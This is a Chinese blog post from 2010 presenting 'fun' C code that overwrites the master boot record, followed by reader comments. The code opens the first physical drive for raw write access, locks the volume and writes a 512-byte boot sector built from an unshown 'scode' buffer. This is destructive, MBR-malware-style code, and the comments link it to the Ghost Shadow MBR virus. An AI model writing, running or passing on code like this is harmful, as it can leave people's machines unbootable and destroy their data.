发现个好玩的代码改写MBR

2010/07/032010/07/03 hello world

 HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);

//MBR结束标记55AA
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
//打开磁盘驱动
hDevice = CreateFile
(
"\\\\.\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);

if (hDevice == INVALID_HANDLE_VALUE)
return -1;

//锁定卷
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&amp;dwBytesReturned,
NULL
);

// 写入内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &amp;dwBytesWritten, NULL);

//解除卷锁定
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&amp;dwBytesReturned,
NULL
);
CloseHandle(hDevice);

 
ExitProcess(-1);
return 0;

运行效果

关注微信公众号，手机阅读更方便: 程序员的阅微草堂

莿鸟栖草堂由 CFC4N 创作，采用知识共享署名-非商业性使用-相同方式共享（3.0未本地化版本）许可协议进行许可。基于http://www.cnxct.com上的作品创作。转载请注明转自：发现个好玩的代码改写MBR

4 thoughts on “发现个好玩的代码改写MBR”

橙子 says:

2010/07/04 at 17:43:28

改写MBR的病毒还是比较多的，比如鬼影就是从MBR引导。。。

回复
- CFC4N says:
  
  2010/07/05 at 10:44:10
  
  上次你研究的那个，也是鬼影吗？ :mrgreen:
  
  回复
Tony says:

2010/07/05 at 18:55:17

很邪恶，吼吼，有意思。 :cool:

回复
jojohot123 says:

2012/03/04 at 16:05:45

呃?显示字符串的代码貌似没有。。。。。

回复

发表评论取消回复

This site uses Akismet to reduce spam. Learn how your comment data is processed.